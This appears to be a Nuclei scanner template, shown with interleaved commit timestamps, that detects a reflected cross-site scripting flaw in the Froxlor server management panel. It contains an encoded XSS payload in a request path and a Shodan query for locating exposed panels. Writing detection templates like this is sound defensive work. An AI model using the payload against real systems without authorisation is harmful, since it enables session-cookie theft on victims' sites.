2023-01-18 07:18:27 +00:00
id : froxlor-xss
2023-01-17 17:16:26 +00:00
info :
2023-03-27 17:46:47 +00:00
name : Froxlor Server Management - Cross-Site Scripting
2023-01-17 17:16:26 +00:00
author : tess
severity : medium
2023-01-18 07:18:27 +00:00
description : |
2023-03-27 17:46:47 +00:00
Froxlor Server Management is susceptible to cross-site scripting via clicking the forgot password link. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2024-09-10 08:22:50 +00:00
cpe : cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*
2023-01-17 17:16:26 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-01-24 10:02:50 +00:00
shodan-query : title:"Froxlor Server Management Panel"
2024-09-10 08:22:50 +00:00
product : froxlor
vendor : froxlor
2023-01-17 17:16:26 +00:00
tags : froxlor,xss
2023-04-27 04:28:59 +00:00
http :
2023-01-17 17:16:26 +00:00
- method : GET
path :
2023-01-17 19:34:20 +00:00
- '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
2023-01-17 17:16:26 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- "javascript:alert(document.domain);dd//"
- "Froxlor"
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2024-09-12 05:14:01 +00:00
# digest: 4a0a0047304502210098fbb6ae865763977cce9673a93d61609f9e6e61d747d441c6a33dad80eabae1022070d54b0324fcf0de1b9dd03fcdea82296adf1eafc7c4f10466b55bde6bdea25d:922c64590222798bb761d5b6d8e72950
